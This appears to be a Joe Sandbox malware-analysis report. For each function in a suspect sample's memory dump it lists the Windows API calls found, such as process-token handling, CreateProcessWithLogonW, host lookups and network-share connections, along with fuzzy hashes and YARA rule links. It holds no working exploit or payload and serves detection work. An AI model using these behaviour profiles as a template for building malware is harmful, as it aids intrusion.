Function 007750E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00775101

Part of subcall function 0076571C: __FF_MSGBANNER.LIBCMT ref: 00765733
Part of subcall function 0076571C: __NMSG_WRITE.LIBCMT ref: 0076573A
Part of subcall function 0076571C: RtlAllocateHeap.NTDLL(01260000,00000000,00000001), ref: 0076575F

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: b17b414bfb583fab0ecece15e76e1306820926c15f90e6a7754536628f23a365
Instruction ID: 31fa21e3158b625a4d001c0b43f9226869d68f21d6452770874f8305acfd3787
Opcode Fuzzy Hash: b17b414bfb583fab0ecece15e76e1306820926c15f90e6a7754536628f23a365
Instruction Fuzzy Hash: 8911A7B1500A19EFCF313F75EC49B6D3B985B043E2B508529FD0E96151DE7C89409791

Function 007985B1 Relevance: 6.1, APIs: 4, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007985E2
OpenProcessToken.ADVAPI32(00000000), ref: 007985E9
CloseHandle.KERNEL32(00000004), ref: 00798603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00798632

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
String ID:
API String ID: 2621361867-0
Opcode ID: 355c798f58f62954bb6bd0bde963a3d4fe0eb0a4ac6b7e9313d7c2aa4d3d792a
Instruction ID: 46ebd0cc51703b84512cfb874baef91b4cec94fc27b0d3747494481f290e78b5
Opcode Fuzzy Hash: 355c798f58f62954bb6bd0bde963a3d4fe0eb0a4ac6b7e9313d7c2aa4d3d792a
Instruction Fuzzy Hash: 9C115C72500249ABDF018FA4ED49FDE7BA9FF49304F048069FE05A2161C7799D64DB61

Function 007B6369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00745A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007A7896,?,?,00000000), ref: 00745A2C
Part of subcall function 00745A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007A7896,?,?,00000000,?,?), ref: 00745A50

gethostbyname.WS2_32(?), ref: 007B6399
WSAGetLastError.WS2_32(00000000), ref: 007B63A4
_memmove.LIBCMT ref: 007B63D1
inet_ntoa.WS2_32(?), ref: 007B63DC

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 1c1381f6e8952c18fb8375408ada9bce6902d6db06ee9cb8e0d6969e9abc37bb
Instruction ID: 0c2608a814e1762870e36a0c6a98f4f8df39ef3dfaaa3b2a2fa6b787826131fc
Opcode Fuzzy Hash: 1c1381f6e8952c18fb8375408ada9bce6902d6db06ee9cb8e0d6969e9abc37bb
Instruction Fuzzy Hash: 58116031600109EFCF04FBA4DD4ADEEBBB9AF04310B148069F606A7162DB39AE14DB61

Function 00798B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00798B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00798B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00798B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00798BA4

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: e3722dbe89a1302faa954764fa9e3fc6126f9d4cd1af7e18371f17f0cad8b5dd
Instruction ID: 7a7d9cc2e1c51bebb2d12ff210b2f12cdb848b2e9f7edcea593c2faa89e10726
Opcode Fuzzy Hash: e3722dbe89a1302faa954764fa9e3fc6126f9d4cd1af7e18371f17f0cad8b5dd
Instruction Fuzzy Hash: 5C110AB9901218FFDF11DB95C885E9DBBB4EB49710F244095E900B7250DA716E11DB94

Function 0079D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0079D84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0079D864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0079D879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0079D897

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: befe2e67ce649987f7eefa36c28844806c6b0256f3c111639e08e58b1f72607d
Instruction ID: 184e8f35211afb34922c7d915ee8459972d061bf461a6e6ec6f52f43e3eca34a
Opcode Fuzzy Hash: befe2e67ce649987f7eefa36c28844806c6b0256f3c111639e08e58b1f72607d
Instruction Fuzzy Hash: 761161B5605304EBEB308FA0EC09F93BBBCEB00B10F10856DE516D6051D7B8E9499BA1

Function 00776FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00776FDB

Part of subcall function 007776C2: __fltout2.LIBCMT ref: 007776EB

__cftog_l.LIBCMT ref: 00777001
__cftoe_l.LIBCMT ref: 00777033

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: a35359942e6699ae27566bd593988a9b74f92866cf0565f9f7942655df9b7578
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 9E014B7244814ABBCF1A5F84CC05CEE3F62BB18391B588425FA1C59031D23AD9B1EB81

Function 007CB2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 007CB2E4
ScreenToClient.USER32(?,?), ref: 007CB2FC
ScreenToClient.USER32(?,?), ref: 007CB320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 007CB33B

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: d102a054c36addc374f7ff2c95d61e1d36de5dd4ea6b762e8d30d876eaf7f502
Instruction ID: e669f9bbf80f693b255d1f9fa050798fd483b84bf4adbed6c951c87d7ef2ec70
Opcode Fuzzy Hash: d102a054c36addc374f7ff2c95d61e1d36de5dd4ea6b762e8d30d876eaf7f502
Instruction Fuzzy Hash: 8A114775D00249EFDB41CF99C844AEEBBF5FF08310F10816AE914E3220D735AA559F54

Function 007CB635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007CB644
_memset.LIBCMT ref: 007CB653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00806F20,00806F64), ref: 007CB682
CloseHandle.KERNEL32 ref: 007CB694

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 6594a8e116923057dd1b8cf9c48a4c3357425042f0c6a3b5d314ebcc6b95b0a1
Instruction ID: 4b5b8a134a9f226e0f9e213ecefc0ccb52d4f34729979f80d312e15b6e67e40d
Opcode Fuzzy Hash: 6594a8e116923057dd1b8cf9c48a4c3357425042f0c6a3b5d314ebcc6b95b0a1
Instruction Fuzzy Hash: 9CF0F4B2640705BAE2502765BC06F7B7A9CFB05795F004025FB09E51A2EF755C3087A8

Function 007A6BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(?), ref: 007A6BE6

Part of subcall function 007A76C4: _memset.LIBCMT ref: 007A76F9

_memmove.LIBCMT ref: 007A6C09
_memset.LIBCMT ref: 007A6C16
RtlLeaveCriticalSection.NTDLL(?), ref: 007A6C26

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 7e6995d3fd20adc02af8de8938433d57a4498bece443a7904da5c76f9d1ef2c8
Instruction ID: bc35890ad0efc91f7435a2465c6d29b6b0883311c7b129ace2d3edefa61ea964
Opcode Fuzzy Hash: 7e6995d3fd20adc02af8de8938433d57a4498bece443a7904da5c76f9d1ef2c8
Instruction Fuzzy Hash: 02F0543A200100BBCF456F55DC89E4ABB2AEF45360F04C065FE095E227C735E811CBB4

Function 00742218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00742231
SetTextColor.GDI32(?,000000FF), ref: 0074223B
SetBkMode.GDI32(?,00000001), ref: 00742250
GetStockObject.GDI32(00000005), ref: 00742258
GetWindowDC.USER32(?,00000000), ref: 0077BE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 0077BE90
GetPixel.GDI32(00000000,?,00000000), ref: 0077BEA9
GetPixel.GDI32(00000000,00000000,?), ref: 0077BEC2
GetPixel.GDI32(00000000,?,?), ref: 0077BEE2
ReleaseDC.USER32(?,00000000), ref: 0077BEED

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: bd6d1d9c9d31a9cc4da8a122801c19d94df7f4af7d449e729df6715de8ae72be
Instruction ID: 687f9ceabe895ad87fcb027408aa9dc88dc3a570bf3879fc7341ba712d4a0134
Opcode Fuzzy Hash: bd6d1d9c9d31a9cc4da8a122801c19d94df7f4af7d449e729df6715de8ae72be
Instruction Fuzzy Hash: ECE06D32104248EBDF215F64FC0DBD83F12EB05332F14C36AFA69880E187B94990DB12

Function 00798712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0079871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,007982E6), ref: 00798722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007982E6), ref: 0079872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,007982E6), ref: 00798736

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 3aec29adbe43c5176921c26f765fceb1ee9ccd0d4ec30f7da7d50246bac00c4a
Instruction ID: f0b96d4a75f6901ae4c2a863bb68ef39cfda48c3921c20fc30c6448f91dc357c
Opcode Fuzzy Hash: 3aec29adbe43c5176921c26f765fceb1ee9ccd0d4ec30f7da7d50246bac00c4a
Instruction Fuzzy Hash: 75E08676611211ABDB605FF06D0CF567BAEEF51B91F14C82CF645CA040DA3C8485C755

Function 00746240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

%}, xrefs: 0074624E

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID:
String ID: %}
API String ID: 0-578177530
Opcode ID: 112eeab0dc72eee3c2005f5e60669cde10339cb497c2c04ed3ea9f8f0a329f4e
Instruction ID: 43e7b6e52ebcdf52f748fd234f88723ce1f30e958810f337c8f3f8bb4accb532
Opcode Fuzzy Hash: 112eeab0dc72eee3c2005f5e60669cde10339cb497c2c04ed3ea9f8f0a329f4e
Instruction Fuzzy Hash: 32B1A171900149DBCF25EF98C8859FEB7B5FF46310F104126E916A7192EB3C9E85CB92

Function 007AAFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0075FC86: _wcscpy.LIBCMT ref: 0075FCA9

Part of subcall function 00749837: __itow.LIBCMT ref: 00749862
Part of subcall function 00749837: __swprintf.LIBCMT ref: 007498AC

__wcsnicmp.LIBCMT ref: 007AB02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 007AB0F6

Strings

LPT, xrefs: 007AB027

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: e3d726575872e0e43ff741322f39b77b729cd57d1657c5078fef78504eb5d35a
Instruction ID: 26282c95c9f29f35ee408f41f7daa71f0d70935f3783affe13d46420833289e4
Opcode Fuzzy Hash: e3d726575872e0e43ff741322f39b77b729cd57d1657c5078fef78504eb5d35a
Instruction Fuzzy Hash: 3461B471A00218EFCB14DF98C895EAFB7B5EF49310F004169F916AB352D778AE44CB51

Function 00752957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00752968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00752981

Strings

@, xrefs: 00752975

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 3cb30fba7a891ab8a16b853fd312c22d7dcc74b9dd6bf26710a50622ea0de2c3
Instruction ID: 4272c108a0f0d332ac36d1a31c869cd433ba58e9f9699f6e8e91df5493830762
Opcode Fuzzy Hash: 3cb30fba7a891ab8a16b853fd312c22d7dcc74b9dd6bf26710a50622ea0de2c3
Instruction Fuzzy Hash: EE514971408748DBD320EF14D88ABAFBBE8FF85344F42885DF2D8411A1DB749529CB56

Function 007A9734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00744F0B: __fread_nolock.LIBCMT ref: 00744F29

_wcscmp.LIBCMT ref: 007A9824
_wcscmp.LIBCMT ref: 007A9837

Strings

FILE, xrefs: 007A9770

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: d2595c1f90d299bcf1a2e681b2e41bd4c7f660003a4fd51f96c5bfda8c0c855d
Instruction ID: e6a9a73cfa30140481208b643997a596de4080dc06840a71183822a373e2d27e
Opcode Fuzzy Hash: d2595c1f90d299bcf1a2e681b2e41bd4c7f660003a4fd51f96c5bfda8c0c855d
Instruction Fuzzy Hash: 2141D871A00219FADF209BA0CC49FEFB7BDDF86710F100069FA04A7181DB79A914DB61

Function 007B258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007B259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007B25D4

Strings

|, xrefs: 007B25A5

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: a0497b2145e8986eee65fb427a13d12fd476f1c57caf375d98920d35620c11b7
Instruction ID: 0b38db2184416883789807a0c2816d14b6b3166e39ee94dbf4ac506f22ed40b9
Opcode Fuzzy Hash: a0497b2145e8986eee65fb427a13d12fd476f1c57caf375d98920d35620c11b7
Instruction Fuzzy Hash: 33310671801119EBCF15EFA0CC89EEEBFB9FF08350F104069F915AA162EB395956DB60

